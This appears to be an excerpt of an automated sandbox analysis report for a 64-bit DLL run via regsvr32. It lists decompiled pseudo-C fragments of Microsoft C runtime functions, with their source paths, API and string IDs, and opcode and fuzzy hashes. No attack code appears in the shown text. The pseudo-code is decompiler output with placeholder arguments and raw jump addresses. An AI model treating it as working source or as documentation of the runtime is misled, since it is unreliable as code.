                                    				_v24 = 1;
                                    				goto 0xf9d3f293;
                                    				_v24 = 0;
                                    				E000007FE7FEF9D26840(_t102,  &_v88);
                                    				_v96 = _v24;
                                    				_v104 = _a8;
                                    				r9d = 1;
                                    				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f2f8;
                                    				0xf9d2ab30();
                                    				 *((intOrPtr*)( *_t149)) = 0x2a;
                                    				_v44 = 0xffffffff;
                                    				E000007FE7FEF9D26800( &_v88);
                                    				goto 0xf9d3f31a;
                                    				_v40 = 1;
                                    				E000007FE7FEF9D26800( &_v88);
                                    				goto 0xf9d3f31a;
                                    				return E000007FE7FEF9D26800( &_v88);
                                    			}

                                    APIs
                                    Strings
                                    • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c, xrefs: 000007FEF9D3F0B9
                                    • _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2, xrefs: 000007FEF9D3F0A4
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide
                                    • String ID: _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c
                                    • API String ID: 3162172745-1617866167
                                    • Opcode ID: c1274c363911339d648a95bedd1909bdcc319eff7e23c8a9712c300a8ba53b59
                                    • Instruction ID: e2321dfd7d4ce97f8464894d094ef21069f5ab619bd2151a5dc0ee19d75eafe6
                                    • Opcode Fuzzy Hash: c1274c363911339d648a95bedd1909bdcc319eff7e23c8a9712c300a8ba53b59
                                    • Instruction Fuzzy Hash: A9913B32A1C78586E7A0DB19E8507AEB7E0F785B45FA08136E6CD837A5DB3ED444CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invoke_watson_if_oneof_swprintf_p
                                    • String ID: $ Data: <%s> %s$%.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                    • API String ID: 792801276-1329727594
                                    • Opcode ID: 607a4edc1d8635394f44f6361f5afd02e99ede9dffc913f916da5ff8546dd257
                                    • Instruction ID: 74781b4b54cd9912b8e06a4704f6bb443746ab51bab07e1bca88e51f830d20d4
                                    • Opcode Fuzzy Hash: 607a4edc1d8635394f44f6361f5afd02e99ede9dffc913f916da5ff8546dd257
                                    • Instruction Fuzzy Hash: E9613972A0D7C186E7B49B51E8907AEBBA0F784740FA18126D6CD47BA9DB3ED444CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: __doserrno$_invalid_parameter
                                    • String ID: (_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_get_osfhandle$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\osfinfo.c
                                    • API String ID: 747159061-3177431134
                                    • Opcode ID: 733470a45f5ff35a9cc2dbc2e65958217baa720b2ccc02f46ae502d5c05be40f
                                    • Instruction ID: 4f8ff4572e8635f5027188ec8a382c63b1dfded0e2620b7392a92efec120cf46
                                    • Opcode Fuzzy Hash: 733470a45f5ff35a9cc2dbc2e65958217baa720b2ccc02f46ae502d5c05be40f
                                    • Instruction Fuzzy Hash: 78518971A1864A8AF7909B59E89076DB3E1F3807A5F609221E2ED477F4C7BEE5008B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Heap$AllocH_enabledSize_invalid_parameter_is_
                                    • String ID: _expand_base$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\expand.c$pBlock != NULL
                                    • API String ID: 1608253119-1427866139
                                    • Opcode ID: 6d96cea77955d8bb906b6453695997b0a193914bba0a0a822ab5dc7dadfec49f
                                    • Instruction ID: bd1364e327bffe51ea07524ffa85e9f05d80aa3f671785f44ca1c30fb28e73d7
                                    • Opcode Fuzzy Hash: 6d96cea77955d8bb906b6453695997b0a193914bba0a0a822ab5dc7dadfec49f
                                    • Instruction Fuzzy Hash: 4D41253191DB4686E7A09B14E84436E76E0F785780F614535E6CD42AF8DBBEE484CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: ("Buffer too small", 0)$_vsnwprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c$format != NULL$string != NULL && sizeInWords > 0
                                    • API String ID: 2123368286-2958264153
                                    • Opcode ID: 54e27a84bf50c775cab06d8b5edff0f5a952963ad436725320079f8e266d75c3
                                    • Instruction ID: d7cc4d0e782f1b7c612564dac91e9d2cb6f3b6ce272f4d7ad0d490e9b620c06e
                                    • Opcode Fuzzy Hash: 54e27a84bf50c775cab06d8b5edff0f5a952963ad436725320079f8e266d75c3
                                    • Instruction Fuzzy Hash: 49E14D31A1DA868AEBB48B24E84076EB3E0F385765F204235E6DD43BE5DB7ED445CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: get_int64_arg
                                    • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 1967237116-569934968
                                    • Opcode ID: cc230896d9a9b78453caf74913fa4f6c5025a346ba52c0faae240e43dd1109e8
                                    • Instruction ID: 22a9a72b2ea07787f3d01dc0e5522a3b9409a08ca4ad9fd04da88529524a1eb4
                                    • Opcode Fuzzy Hash: cc230896d9a9b78453caf74913fa4f6c5025a346ba52c0faae240e43dd1109e8
                                    • Instruction Fuzzy Hash: B4D11D7260DBC58BE7B1CB65E8507AEB7E4F384785F200125EAC886AA9DB7DD540CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000007FE7FEF9D3BFDE(char _a696, char _a976) {
                                    
                                    				_a976 = _a696;
                                    				_a976 = _a976 - 0x41;
                                    				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                    				goto __rax;
                                    			}

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: wctomb_s
                                    • String ID: $("Incorrect format specifier", 0)$7$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2215178078-1895985292
                                    • Opcode ID: 328cc2888182d49a31844c3056f2ccb27a85ea43ad5a4f85c1908e4795749c83
                                    • Instruction ID: 7adfc43390c165502d6a8fb190fde7d628b4034d943845d6c2f74ff038b9ebc8
                                    • Opcode Fuzzy Hash: 328cc2888182d49a31844c3056f2ccb27a85ea43ad5a4f85c1908e4795749c83
                                    • Instruction Fuzzy Hash: 64B12E7260C7C68AE7B1CB24E8457AEB7E4F384785F204125DAD987AA9DB7DD540CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: ("Buffer too small", 0)$_vsprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL$string != NULL && sizeInBytes > 0
                                    • API String ID: 2123368286-348877268
                                    • Opcode ID: b6bbebb1f4d85d28a6809bfbee2de0be140824b02a8ca1d2541b9b7cfc6d5eb8
                                    • Instruction ID: 000baf689883631365c7c02d111a1b1a2de10ec58b0e6b3448400e9d2f0f3b8d
                                    • Opcode Fuzzy Hash: b6bbebb1f4d85d28a6809bfbee2de0be140824b02a8ca1d2541b9b7cfc6d5eb8
                                    • Instruction Fuzzy Hash: AE915C32E0CA428AE7A08B68E84476E77E0F394365F604625E7DD43AF8DB7ED544CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$(ch != _T('\0'))$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2192614184-4087627024
                                    • Opcode ID: 957d201a7f975e21043e4e8cb8b7cb2b2c46c9e35bbf440868bf758d6fc38531
                                    • Instruction ID: 7ef584807be417e268083fb343ad6d7be6558f6767769905c9ec51bf7eddb7ed
                                    • Opcode Fuzzy Hash: 957d201a7f975e21043e4e8cb8b7cb2b2c46c9e35bbf440868bf758d6fc38531
                                    • Instruction Fuzzy Hash: 61713A72A0D6C286E7F09B24E8947BEB7E4E384345F604126D6CD86AA9DB3ED541CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: dst != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\memcpy_s.c$memcpy_s$sizeInBytes >= count$src != NULL
                                    • API String ID: 2123368286-3692278645
                                    • Opcode ID: 401d9823d412221fb6395ed79c47aff3affb5440d9467cb4f29d8a138cee4ba4
                                    • Instruction ID: fae548ccfa44dfd2566f43a5020e02f413341588dce5173fb2663fa56b07ad66
                                    • Opcode Fuzzy Hash: 401d9823d412221fb6395ed79c47aff3affb5440d9467cb4f29d8a138cee4ba4
                                    • Instruction Fuzzy Hash: 18515C31A1C64686F7A08B54E8447AE77E5F384344FA04136E6CD43AB8DBBEE545CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free_base_malloc_base
                                    • String ID:
                                    • API String ID: 3824334587-0
                                    • Opcode ID: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                    • Instruction ID: 495d8382669efda2ae004298a380b2f700874c64e4d866c5cb6fbd4b09cb9029
                                    • Opcode Fuzzy Hash: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                    • Instruction Fuzzy Hash: AC312D3191D68285E7E49B60EC0437EA3E1F7853A4F214535A6DE466F5CFBEE4809B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$state != NULL
                                    • API String ID: 2123368286-817335350
                                    • Opcode ID: 79c801832210f02bb2549a70f13a14fc678dbb47873921c6f453ebac8324fa6a
                                    • Instruction ID: a7fd658f0f883f275d3cb6d605636d4d7d2232aae341650a7fa887ee8dadd8b1
                                    • Opcode Fuzzy Hash: 79c801832210f02bb2549a70f13a14fc678dbb47873921c6f453ebac8324fa6a
                                    • Instruction Fuzzy Hash: 80610B36A18B4186EB64CB59E89132EB7A0F385794F714126EBCD83BB4CB3ED441CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000007FE7FEF9D2CFF0(intOrPtr _a8) {
                                    				intOrPtr _v24;
                                    				long long _v48;
                                    				long long _v64;
                                    				intOrPtr _t21;
                                    
                                    				_a8 = _t21;
                                    				_v48 = 0;
                                    				_v64 = 0;
                                    				_v24 = _a8;
                                    				_v24 = _v24 - 2;
                                    				if (_v24 - 0x14 > 0) goto 0xf9d2d13e;
                                    				goto __rax;
                                    			}








                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: ("Invalid signal or error", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\winsig.c$raise
                                    • API String ID: 2123368286-2245755083
                                    • Opcode ID: ea92073534654960e4773f731c7ed7de4444a26fa1832afe31598046f11c2526
                                    • Instruction ID: 64874b8661254a0ae2b01e5280f4eb25b6cc5e7b5243a42f7df21d474b3e4b39
                                    • Opcode Fuzzy Hash: ea92073534654960e4773f731c7ed7de4444a26fa1832afe31598046f11c2526
                                    • Instruction Fuzzy Hash: 3871E83291C7868AE7A48B58E84436EB7E0F785754F214135E6CE47BA4DB3EE448CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: HeapPointerValid
                                    • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$L7$LX
                                    • API String ID: 299318057-1988567080
                                    • Opcode ID: daa921bd4a8f87b13c34e3fb9a704e2154bbea7e848b38387929040681ee6967
                                    • Instruction ID: 749e228a184b7b5abc50e7f522a6a47edf15a58a7031c3663ed602be408c8cc7
                                    • Opcode Fuzzy Hash: daa921bd4a8f87b13c34e3fb9a704e2154bbea7e848b38387929040681ee6967
                                    • Instruction Fuzzy Hash: 28314D36A1864A85EBE48B59E84172E67D1F385784F714036EACD83BB5DB3FD440CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: EncodePointer$_realloc_dbg
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\onexit.c$}
                                    • API String ID: 429494535-1858280179
                                    • Opcode ID: c2a3dc5e3c5b3ef6ce05fce9891920db6be9e05d2791cfb21aba20a8a533fa4f
                                    • Instruction ID: d34c943794379c2c172b76bd65526e764d0d85b1982d09e34a5c92bdfa9d3ddf
                                    • Opcode Fuzzy Hash: c2a3dc5e3c5b3ef6ce05fce9891920db6be9e05d2791cfb21aba20a8a533fa4f
                                    • Instruction Fuzzy Hash: 8141B836619A8586DA90CB59F88432EB7E4F7C9794F201025EACE43B68DF7ED4958B00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: get_int64_arg
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 1967237116-734865713
                                    • Opcode ID: 3c24d1ab21f2eaa164015dd35ad3ad4baa8f1e206880d9711f96d4d726ca0df5
                                    • Instruction ID: a4401d07f2fb6cffb5d65cb91d5b1a1a6a6edb3a16c82fb832ec879f024f4c4f
                                    • Opcode Fuzzy Hash: 3c24d1ab21f2eaa164015dd35ad3ad4baa8f1e206880d9711f96d4d726ca0df5
                                    • Instruction Fuzzy Hash: 60D1CA72A0CAC686E7B18B55E8407AFB7E0F384355F600126E6D987AA9DB7DE440CF14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000007FE7FEF9D3DF8D(signed short _a1208, signed int _a1412) {
                                    
                                    				_a1412 = _a1208 & 0x0000ffff;
                                    				_a1412 = _a1412 - 0x41;
                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                    				goto __rax;
                                    			}




                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ("Incorrect format specifier", 0)$7$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 0-1585035072
                                    • Opcode ID: 3ac2e27d66d95a25dfb2edd2f0848946df9d4bfe2e481795af5e1dbd4b0ec7bb
                                    • Instruction ID: 786758f90f15de6030b6b0b797e7a3976266de7f5bb6935df7b5cb31798ef030
                                    • Opcode Fuzzy Hash: 3ac2e27d66d95a25dfb2edd2f0848946df9d4bfe2e481795af5e1dbd4b0ec7bb
                                    • Instruction Fuzzy Hash: D0B1FD7260CAC286E7B1DB55E8417AFB7E0F784356F104126EAC987AA9DB7DE440CF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (count == 0) || (string != NULL)$(format != NULL)$_vswprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c
                                    • API String ID: 2123368286-1876092940
                                    • Opcode ID: 5533e41279f98ba4d4f5350db4eab6cd9eaa803fb231b9fee7a87e58e20f6e26
                                    • Instruction ID: 67313c86c0907fb9479329b5879005a062486a8a0ba054e26d823845a12987d7
                                    • Opcode Fuzzy Hash: 5533e41279f98ba4d4f5350db4eab6cd9eaa803fb231b9fee7a87e58e20f6e26
                                    • Instruction Fuzzy Hash: FA911E32618B85CAE7A48B15E84476E77E0F384795F208525E6DE87BB4DB3ED444CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E000007FE7FEF9D3BE32(signed int _a80, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096) {
                                    
                                    				_a972 = _a696 & 0x000000ff;
                                    				if (_a972 == 0x49) goto 0xf9d3beb7;
                                    				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                    				if (_a972 == 0x6c) goto 0xf9d3be76;
                                    				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                    				goto 0xf9d3bfd9;
                                    				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
